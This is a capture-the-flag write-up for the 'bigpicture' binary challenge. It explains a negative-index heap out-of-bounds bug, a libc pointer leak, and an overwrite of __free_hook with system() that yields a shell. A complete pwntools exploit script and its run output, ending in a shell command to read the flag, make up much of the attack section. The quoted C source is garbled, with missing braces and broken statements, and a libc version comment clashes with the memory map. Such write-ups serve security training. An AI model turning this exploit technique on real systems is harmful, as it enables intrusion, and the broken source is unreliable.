Task description:

Size matters!

We’re presented with a x86_64 ELF binary, libc it’s using and the source code.

$ nc bigpicture.chal.pwning.xxx 420 
Let's draw a picture!
How big?  1 x 1
> 0 , 0 , A 
> q

The source:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

int width, height;
char *buf;

void plot(int x, int y, char c);
void draw();

int main() {
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);
	setbuf(stderr, NULL);
	puts("Let's draw a picture!");
	fputs("How big? ", stdout);
	scanf(" %d x %d", &width, &height);
	buf = calloc(width, height);
	if(buf == NULL) {
		return -1;
	char c;
	while(1) {
		fputs("> ", stdout);
		int x, y;
		if(scanf(" %d , %d , %c", &x, &y, &c) != 3)
		plot(x, y, c);
	if(scanf(" quit%c", &c) != 1)
	return 0;

char *get(size_t x, size_t y) {
	return &buf[x * height + y];

void plot(int x, int y, char c) {
	if(x >= width || y >= height) {
		puts("out of bounds!");
	char *ptr = get(x, y);
	if(*ptr != 0)
		printf("overwriting %c!\n", *ptr);
		*ptr = c;

void draw() {
	int x, y;
	char c;
	for(y = height-1; y >= 0; y--) {
		for(x = 0; x < width; x++) {
			c = *get(x, y);
			if(c == 0)
				c = ' ';
			if(putchar(c) != c)

This is a plot drawing binary. You enter the matrix size and fill it up with characters. At the end the resulting matrix is printed back to you. The program allocates width * height bytes on the heap to store plot values.

The actual vulnerability is in the plot function:

void plot(int x, int y, char c) {
	if(x >= width || y >= height) {
		puts("out of bounds!");
	char *ptr = get(x, y);
	if(*ptr != 0)
		printf("overwriting %c!\n", *ptr);
		*ptr = c;

Note, that both width and height variables are signed, but only upper bounds are checked. Specifying negative signed values allows us to read arbitrary non-zero values in the memory before heap or write arbirary values in case the target memory is zero. Unfortunately the binary’s relocation section is write-protected and ASLR was on. There was no obvious way to affect the control flow of the program given the only memory before the heap was the .text and .data sections of the binary. This is the case when the amount of data allocated on the heap is less then M_MMAP_THRESHOLD value on the system. If the value is less the this constant then brk() system call is used to increase program break and heap is in fact allocated in the .data section of the binary. Quote from man:

Note: Nowadays, glibc uses a dynamic mmap threshold by default. The initial value of the threshold is 128*1024

Luckily for us we can force calloc() to use mmap() to map new memory segment using the value equal to or greater than 128*1024. This way we observe the heap being just below libc.so at a fixed offset:

  Start Addr           End Addr       Size     Offset   objfile
0x55c718337000     0x55c718338000     0x1000        0x0 bigpicture
0x55c718538000     0x55c718539000     0x1000     0x1000 bigpicture
0x55c718539000     0x55c71853a000     0x1000     0x2000 bigpicture
0x7f1d3d9b8000     0x7f1d3db76000   0x1be000        0x0 libc-2.19.so
0x7f1d3db76000     0x7f1d3dd75000   0x1ff000   0x1be000 libc-2.19.so
0x7f1d3dd75000     0x7f1d3dd79000     0x4000   0x1bd000 libc-2.19.so
0x7f1d3dd79000     0x7f1d3dd7b000     0x2000   0x1c1000 libc-2.19.so
0x7f1d3dd7b000     0x7f1d3dd80000     0x5000        0x0 
0x7f1d3dd80000     0x7f1d3dda3000    0x23000        0x0 ld-2.19.so
0x7f1d3df72000     0x7f1d3df96000    0x24000        0x0 <---- HEAP
0x7f1d3dfa0000     0x7f1d3dfa2000     0x2000        0x0 
0x7f1d3dfa2000     0x7f1d3dfa3000     0x1000    0x22000 ld-2.19.so
0x7f1d3dfa3000     0x7f1d3dfa4000     0x1000    0x23000 ld-2.19.so
0x7f1d3dfa4000     0x7f1d3dfa5000     0x1000        0x0 
0x7fff67f57000     0x7fff67f78000    0x21000        0x0 [stack]
0x7fff67fa3000     0x7fff67fa5000     0x2000        0x0 [vvar]
0x7fff67fa5000     0x7fff67fa7000     0x2000        0x0 [vdso]

We want to overwrite the __free_hook pointer at libc’s data section with address of system(). It is used by the free function:


This hook is placed in the .bss section of libc at a fixed offset:

.bss:00000000003C57A8    public __free_hook ; weak
.bss:00000000003C57A8    ; __int64 (__fastcall *_free_hook)(_QWORD, _QWORD)

To figure out the absolute address of system() we need to leak the address of some location in libc. Again, we can use .got section of libc which contains pointer to free() funcion at a fixed address:

.got:00000000003C2F98    free_ptr    dq offset free    ; DATA XREF: j_free_r

Last thing we have to do is write /bin/sh string to the memory allocated on the heap as its reference will be passed to the free function, which is effectively replaced with system().

Exploit code

from pwn import *
from time import sleep
from struct import unpack, pack
import sys
import re

#libc 2.23

offset_to_start_libc = -0x5c2010 
offset_system = 0x045390
offset_free = 0x083940
offset_ptr_free = 0x03C2F98
offset_free_hook = 0x3C57A8

pc = remote('bigpicture.chal.pwning.xxx', 420)
pc.sendline(' 131072 x 1\n')  # 128 * 1024

pointer_buf = ''

for i in range(-8, -2):
	off = offset_to_start_libc + offset_ptr_free + 8
	pc.sendline(' {} , {} , A\n'.format(off, i))
	res = pc.recv()
	byte =  re.search("overwriting (.{1})!", res).group(1)
	pointer_buf += byte

offset_abs_free = unpack("<Q", pointer_buf + '\x00\x00')[0]

print 'Free address:', hex(offset_abs_free) 

offset_abs_system = offset_abs_free - (offset_free - offset_system)

print 'System address:', hex(offset_abs_system)
print 'Overwriting __free_hook ptr with system address'

for k, i in enumerate(range(-8,-2)):
	byte_to_send = pack("<Q", offset_abs_system)[k]
	off = offset_to_start_libc + offset_free_hook + 8
	pc.sendline(' {} , {} , {}\n'.format(off , i, byte_to_send))	

print 'Writing "/bin/sh" to heap'

for k, i in enumerate(range(-8, 0)):
	byte_to_send = '/bin/sh\x00'[k]
	pc.sendline(' {} , {} , {}\n'.format(8 , i, byte_to_send))	

pc.sendline(' q')
# python sploit.py
[+] Opening connection to bigpicture.chal.pwning.xxx on port 420: Done
Free address: 0x7f973313d940
System address: 0x7f97330ff390
Overwriting __free_hook ptr with system address
Writing "/bin/sh" to heap
[*] Switching to interactive mode
$ cat /home/bigpicture/flag